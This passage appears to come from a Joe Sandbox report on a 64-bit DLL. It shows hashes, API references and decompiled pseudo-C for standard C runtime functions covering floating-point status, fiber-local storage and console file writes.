Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction ID: b8a514f96cc962178e2c21d06bd04b396a6d47d5a7eb5726581bb42ef1dd582d
Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction Fuzzy Hash: 71F03CA1B18E0395FA148B34E4A43B96360AF8B7B9F540236D96E452F4CF6CD0488300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466EB68 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFD7FFD1466EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x1466eb9a;
				if (sil >= 0) goto 0x1466eb9a;
				E00007FFD7FFD14671CEC(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x1466ebf1;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x1466ebb5;
				asm("dec eax");
				if (_t42 >= 0) goto 0x1466ebb5;
				E00007FFD7FFD14671CEC(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x1466ebf1;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x1466ebd1;
				asm("dec eax");
				if (_t43 >= 0) goto 0x1466ebd1;
				E00007FFD7FFD14671CEC(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x1466ebf1;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x1466ebf1;
				asm("dec eax");
				if (_t44 >= 0) goto 0x1466ebf1;
				if ((dil & 0x00000010) == 0) goto 0x1466ebee;
				E00007FFD7FFD14671CEC(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x1466ec0b;
				asm("dec eax");
				if (_t46 >= 0) goto 0x1466ec0b;
				E00007FFD7FFD14671CEC(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x7ffd1466eb68
0x7ffd1466eb6d
0x7ffd1466eb7c
0x7ffd1466eb84
0x7ffd1466eb89
0x7ffd1466eb90
0x7ffd1466eb95
0x7ffd1466eb98
0x7ffd1466eb9f
0x7ffd1466eba2
0x7ffd1466eba4
0x7ffd1466eba9
0x7ffd1466ebab
0x7ffd1466ebb0
0x7ffd1466ebb3
0x7ffd1466ebb5
0x7ffd1466ebb9
0x7ffd1466ebbb
0x7ffd1466ebc0
0x7ffd1466ebc7
0x7ffd1466ebcc
0x7ffd1466ebcf
0x7ffd1466ebd1
0x7ffd1466ebd5
0x7ffd1466ebd7
0x7ffd1466ebdc
0x7ffd1466ebe2
0x7ffd1466ebe9
0x7ffd1466ebee
0x7ffd1466ebf1
0x7ffd1466ebf5
0x7ffd1466ebf7
0x7ffd1466ebfc
0x7ffd1466ec03
0x7ffd1466ec21

APIs

_set_statfp.LIBCMT ref: 00007FFD1466EB90
_set_statfp.LIBCMT ref: 00007FFD1466EBAB
_set_statfp.LIBCMT ref: 00007FFD1466EBC7
_set_statfp.LIBCMT ref: 00007FFD1466EC03

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction ID: d2b3214c6d4acbf28a5a9fbc3acef095818d1017b9e71fc58f325b2f7d03dde3
Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction Fuzzy Hash: BA11C1AAF1CE1341F6541178EAF73F915496F9B37CE084635F96F063DACE2CA9494104

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466BB14 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB33
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB52
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB7A
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB8B
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB9C

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
Instruction ID: 5ac526b42cdc3cb4d990a691513c5cb1324ed6e563eb7ec1c1493639355da360
Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
Instruction Fuzzy Hash: 5A117F60F0CE5682FA58A73299F22F9514A5F47BB8F148734E87D077DADE2CB5818340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466B9A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFD1466B9B9
FlsSetValue.KERNEL32 ref: 00007FFD1466B9D8
FlsSetValue.KERNEL32 ref: 00007FFD1466BA00
FlsSetValue.KERNEL32 ref: 00007FFD1466BA11
FlsSetValue.KERNEL32 ref: 00007FFD1466BA22

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
Instruction ID: e38c76d064e4b2e7f9ed042864219daae1cd38a03fcc49a039449f1334c76d62
Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
Instruction Fuzzy Hash: CF111E50F0CE5782F968A73298F22F911418F57B7CF184739E83E0A6D7DD2CB4829244

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14670958 Relevance: 6.3, APIs: 4, Instructions: 305
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFD7FFD14670958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t181;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t263;
				signed long long _t264;
				signed long long _t267;
				long long _t269;
				signed long long _t271;
				long long _t276;
				long long _t278;
				long long _t280;
				intOrPtr* _t289;
				intOrPtr _t294;
				long long _t295;
				long long _t318;
				void* _t326;
				long long _t327;
				void* _t328;
				long long _t329;
				long long _t331;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				intOrPtr* _t335;
				void* _t336;
				void* _t337;
				signed long long _t338;
				intOrPtr _t341;
				signed long long _t343;
				void* _t345;
				intOrPtr* _t347;
				intOrPtr _t351;
				signed long long _t356;
				signed long long _t359;
				signed long long _t361;
				void* _t364;
				long long _t365;
				long long _t367;
				char _t368;
				void* _t372;
				signed char* _t373;
				signed long long _t375;

				_t263 = _t337;
				_t336 = _t263 - 0x57;
				_t338 = _t337 - 0xe0;
				 *((long long*)(_t336 - 9)) = 0xfffffffe;
				 *((long long*)(_t263 + 8)) = __rbx;
				_t264 =  *0x146de008; // 0xef3156171c50
				 *(_t336 + 0x17) = _t264 ^ _t338;
				 *((long long*)(_t336 - 0x49)) = __r8;
				_t289 = __rcx;
				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
				 *((long long*)(_t336 - 0x51)) = _t367;
				 *(_t336 - 0x19) = __edx;
				_t267 = __edx >> 6;
				 *(_t336 - 0x59) = _t267;
				 *(_t336 - 0x11) = __edx;
				_t375 = __edx + __edx * 8;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
				 *((long long*)(_t336 - 0x29)) = _t269;
				r12d = r9d;
				_t365 = _t364 + __r8;
				 *((long long*)(_t336 - 0x71)) = _t365;
				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x146709f8;
				0x14669140();
				_t294 =  *((intOrPtr*)(_t367 + 0x18));
				r8d =  *(_t294 + 0xc);
				 *(_t336 - 0x5d) = r8d;
				 *((long long*)(__rcx)) = _t269;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x14670db8;
				_t271 = __edx >> 6;
				 *(_t336 - 0x21) = _t271;
				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0x14670bc0;
				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t271 * 8));
				if ( *_t347 == dil) goto 0x14670a74;
				_t372 = _t329 + 1;
				if (_t372 - 5 < 0) goto 0x14670a61;
				if (_t372 == 0) goto 0x14670b52;
				r12d =  *((char*)(_t294 + 0x7ffd146de8f0));
				r12d = r12d + 1;
				_t181 = r12d - 1;
				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
				_t341 = _t181;
				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x14670d27;
				_t295 = _t329;
				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
				if (_t295 + 1 - _t372 < 0) goto 0x14670ab9;
				if (_t341 <= 0) goto 0x14670aea;
				E00007FFD7FFD146664D0( *( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
				_t318 = _t329;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
				if (_t318 + 1 - _t372 < 0) goto 0x14670aed;
				 *((long long*)(_t336 - 0x41)) = _t329;
				_t276 = _t336 - 1;
				 *((long long*)(_t336 - 0x39)) = _t276;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t338 + 0x20)) = _t367;
				E00007FFD7FFD14671744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
				if (_t276 == 0xffffffff) goto 0x14670db8;
				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
				goto 0x14670c55;
				_t368 =  *((char*)(_t276 + 0x7ffd146de8f0));
				_t212 = _t368 + 1;
				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
				if (_t212 - _t343 > 0) goto 0x14670d55;
				 *((long long*)(_t336 - 0x69)) = _t329;
				 *((long long*)(_t336 - 0x31)) = _t331;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t278 =  *((intOrPtr*)(_t336 - 0x51));
				 *((long long*)(_t338 + 0x20)) = _t278;
				E00007FFD7FFD14671744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
				if (_t278 == 0xffffffff) goto 0x14670db8;
				_t332 = _t331 + _t368;
				r12d = r14d;
				goto 0x14670c55;
				_t359 =  *(_t336 - 0x59);
				_t351 =  *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t359 * 8));
				_t213 =  *(_t351 + 0x3d + _t375 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0x14670bf7;
				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
				 *((char*)(_t336 + 8)) =  *_t332;
				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0x14670c40;
				r8d =  *_t332 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x14670c3a;
				_t373 =  &(_t332[1]);
				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x14670d93;
				r8d = 2;
				if (E00007FFD7FFD1466E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x14670db8;
				_t333 = _t373;
				goto 0x14670c55;
				_t198 = E00007FFD7FFD1466E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
				if (_t198 == 0xffffffff) goto 0x14670db8;
				_t334 =  &(_t333[1]);
				 *((long long*)(_t338 + 0x38)) = _t329;
				 *((long long*)(_t338 + 0x30)) = _t329;
				 *((intOrPtr*)(_t338 + 0x28)) = 5;
				_t280 = _t336 + 0xf;
				 *((long long*)(_t338 + 0x20)) = _t280;
				r9d = r12d;
				_t345 = _t336 - 0x7d;
				E00007FFD7FFD1466D698();
				r14d = _t198;
				if (_t198 == 0) goto 0x14670db8;
				 *((long long*)(_t338 + 0x20)) = _t329;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x14670db0;
				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x14670db8;
				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x14670d10;
				 *((short*)(_t338 + 0x40)) = 0xd;
				 *((long long*)(_t338 + 0x20)) = _t329;
				_t128 = _t280 - 0xc; // 0x1
				r8d = _t128;
				_t326 = _t338 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x14670db0;
				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x14670db8;
				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x14670db8;
				r8d =  *(_t336 - 0x5d);
				goto 0x14670a23;
				if (_t326 <= 0) goto 0x14670d50;
				_t335 = _t334 - _t373;
				 *((char*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
				if (1 - _t326 < 0) goto 0x14670d2f;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
				goto 0x14670db8;
				if (_t345 <= 0) goto 0x14670d8d;
				_t327 = _t329;
				_t361 =  *(_t336 - 0x19) >> 6;
				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
				_t328 = _t327 + 1;
				if (2 - _t345 < 0) goto 0x14670d6d;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
				goto 0x14670db8;
				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
				 *( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
				_t174 = _t328 + 1; // 0x1
				 *((intOrPtr*)(_t289 + 4)) = _t174;
				goto 0x14670db8;
				 *_t289 = GetLastError();
				return E00007FFD7FFD14663A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
			}

0x7ffd14670958
0x7ffd14670966
0x7ffd1467096a
0x7ffd14670971
0x7ffd14670979
0x7ffd1467097d
0x7ffd14670987
0x7ffd1467098e
0x7ffd14670995
0x7ffd14670998
0x7ffd1467099c
0x7ffd146709a3
0x7ffd146709aa
0x7ffd146709ae
0x7ffd146709bc
0x7ffd146709c0
0x7ffd146709cc
0x7ffd146709d1
0x7ffd146709d5
0x7ffd146709d8
0x7ffd146709db
0x7ffd146709e5
0x7ffd146709ee
0x7ffd146709f3
0x7ffd146709f8
0x7ffd146709fc
0x7ffd14670a00
0x7ffd14670a06
0x7ffd14670a09
0x7ffd14670a10
0x7ffd14670a19
0x7ffd14670a1d
0x7ffd14670a25
0x7ffd14670a29
0x7ffd14670a2c
0x7ffd14670a40
0x7ffd14670a5b
0x7ffd14670a64
0x7ffd14670a68
0x7ffd14670a72
0x7ffd14670a77
0x7ffd14670a8f
0x7ffd14670a98
0x7ffd14670a9e
0x7ffd14670aa0
0x7ffd14670aaa
0x7ffd14670ab0
0x7ffd14670ab6
0x7ffd14670abc
0x7ffd14670ac9
0x7ffd14670ace
0x7ffd14670ada
0x7ffd14670aea
0x7ffd14670af8
0x7ffd14670b03
0x7ffd14670b05
0x7ffd14670b09
0x7ffd14670b0d
0x7ffd14670b1a
0x7ffd14670b1c
0x7ffd14670b1f
0x7ffd14670b22
0x7ffd14670b33
0x7ffd14670b3c
0x7ffd14670b4a
0x7ffd14670b4d
0x7ffd14670b55
0x7ffd14670b5e
0x7ffd14670b66
0x7ffd14670b6f
0x7ffd14670b75
0x7ffd14670b79
0x7ffd14670b85
0x7ffd14670b87
0x7ffd14670b8a
0x7ffd14670b8d
0x7ffd14670b91
0x7ffd14670ba2
0x7ffd14670bab
0x7ffd14670bb1
0x7ffd14670bb4
0x7ffd14670bbb
0x7ffd14670bc0
0x7ffd14670bc4
0x7ffd14670bcc
0x7ffd14670bd4
0x7ffd14670bdb
0x7ffd14670be0
0x7ffd14670be6
0x7ffd14670beb
0x7ffd14670bf5
0x7ffd14670bf7
0x7ffd14670c07
0x7ffd14670c09
0x7ffd14670c11
0x7ffd14670c1a
0x7ffd14670c2f
0x7ffd14670c35
0x7ffd14670c38
0x7ffd14670c47
0x7ffd14670c4f
0x7ffd14670c55
0x7ffd14670c58
0x7ffd14670c5d
0x7ffd14670c62
0x7ffd14670c6a
0x7ffd14670c6e
0x7ffd14670c73
0x7ffd14670c76
0x7ffd14670c7f
0x7ffd14670c84
0x7ffd14670c89
0x7ffd14670c8f
0x7ffd14670c98
0x7ffd14670cae
0x7ffd14670cbc
0x7ffd14670cc3
0x7ffd14670cce
0x7ffd14670cd5
0x7ffd14670cda
0x7ffd14670ce3
0x7ffd14670ce3
0x7ffd14670ce7
0x7ffd14670cf7
0x7ffd14670d01
0x7ffd14670d07
0x7ffd14670d0a
0x7ffd14670d14
0x7ffd14670d1e
0x7ffd14670d22
0x7ffd14670d2a
0x7ffd14670d2c
0x7ffd14670d3e
0x7ffd14670d4e
0x7ffd14670d50
0x7ffd14670d53
0x7ffd14670d58
0x7ffd14670d5a
0x7ffd14670d61
0x7ffd14670d69
0x7ffd14670d7c
0x7ffd14670d82
0x7ffd14670d8b
0x7ffd14670d8d
0x7ffd14670d91
0x7ffd14670d95
0x7ffd14670da2
0x7ffd14670da8
0x7ffd14670dab
0x7ffd14670dae
0x7ffd14670db6
0x7ffd14670de1

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFD146709DF
WriteFile.KERNEL32 ref: 00007FFD14670CA6
WriteFile.KERNEL32 ref: 00007FFD14670CEF
GetLastError.KERNEL32 ref: 00007FFD14670DB0

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction ID: d373b6b7b99012663f72dcc3340fb4e2b3d432f2fe154d4021bc31fb647a99c4
Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction Fuzzy Hash: DCD1DF66B08B8189F710CF79D4902EC3BB1EB467ACB148236DE5D97B99CE38E446C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1467129C Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FFD7FFD1467129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t169;
				signed long long _t182;
				signed long long _t186;
				signed long long _t189;
				signed long long _t208;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t228;
				signed long long _t229;
				signed short* _t230;
				void* _t231;
				signed short* _t232;

				_t122 = __ebx;
				r15d = r8d;
				_t186 = __r9;
				_t230 = __rdx;
				if (r8d == 0) goto 0x14671599;
				if (__rdx != 0) goto 0x14671303;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t209;
				E00007FFD7FFD14669674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
				goto 0x1467159b;
				_t189 = __ecx >> 6;
				_v120 = _t189;
				_t229 = __ecx + __ecx * 8;
				if (_t210 - 1 - 1 > 0) goto 0x14671339;
				if (( !r15d & 0x00000001) == 0) goto 0x146712cc;
				if (( *( *((intOrPtr*)(0x146df940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x1467134f;
				r8d = 0x7ffd146df942;
				E00007FFD7FFD14671E38(r12d);
				_v96 = _t209;
				if (E00007FFD7FFD146716A0(r12d, __ecx) == 0) goto 0x14671485;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x146df940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x14671485;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x14671396;
				0x14669140();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x146713b2;
				_t182 =  *((intOrPtr*)(0x146df940 + _v120 * 8));
				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x14671485;
				if (GetConsoleMode(??, ??) == 0) goto 0x1467147a;
				if (sil == 0) goto 0x14671457;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0x1467151e;
				_t228 = _t230 + _t231;
				_v112 = _t209;
				_t232 = _t230;
				if (_t230 - _t228 >= 0) goto 0x14671514;
				_v80 =  *_t232 & 0x0000ffff;
				_t107 = E00007FFD7FFD14671E40( *_t232 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0x14671449;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0x1467143a;
				if (E00007FFD7FFD14671E40(0xd) != 0xd) goto 0x14671449;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t232[1]) - _t228 >= 0) goto 0x14671514;
				goto 0x146713fa;
				_v112 = GetLastError();
				goto 0x14671514;
				r9d = r15d;
				_v136 = __r9;
				E00007FFD7FFD14670958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
				asm("movsd xmm0, [eax]");
				goto 0x14671519;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x146df940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x146714e1;
				_t169 = sil;
				if (_t169 == 0) goto 0x146714cd;
				if (_t169 == 0) goto 0x146714b9;
				if (_t147 - 1 != 1) goto 0x14671529;
				r9d = r15d;
				E00007FFD7FFD14670EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x1467146e;
				r9d = r15d;
				E00007FFD7FFD14671004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
				goto 0x1467146e;
				r9d = r15d;
				E00007FFD7FFD14670DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x1467146e;
				r8d = r15d;
				_v136 = _v136 & _t182;
				_v112 = _t182;
				_v104 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x14671511;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0x14671592;
				_t117 = _v96;
				if (_t117 == 0) goto 0x14671568;
				if (_t117 != 5) goto 0x14671558;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
				 *((char*)(_t186 + 0x38)) = 1;
				 *(_t186 + 0x34) = _t117;
				goto 0x146712fb;
				_t208 = _t186;
				E00007FFD7FFD1466B3DC(_v96, _t208);
				goto 0x146712fb;
